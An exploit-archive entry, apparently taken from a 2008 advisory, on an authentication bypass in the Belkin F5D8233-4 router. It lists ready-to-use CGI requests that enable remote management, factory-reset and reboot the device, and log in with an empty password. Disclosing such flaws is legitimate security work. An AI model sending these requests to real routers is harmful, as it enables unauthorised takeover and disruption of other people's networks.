Belkin F5D8233-4 Wireless N Router (Multiple Scripts) - Authentication Bypass
Author: Craig Heffner
type: remote
platform: hardware
port:
date_added: 2008-11-12
date_updated: 2014-03-30
verified: 1
codes: OSVDB-57389
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/32275/info
The Belkin F5D8233-4 Wireless N Router is prone to multiple vulnerabilities because of a lack of authentication when users access specific administration scripts.
Attackers can exploit these issues to perform administrative functions without authorization.
Belkin F5D8233-4 is vulnerable; other devices may also be affected.
Enable remote management on port 8080: /cgi-bin/system_setting.exe?remote_mgmt_enabled=1&remote_mgmt_port=8080
Restore the router's default factory settings: /cgi-bin/restore.exe
Reboot the router: /cgi-bin/restart.exe
Log in with the default password": /cgi-bin/login.exe?pws=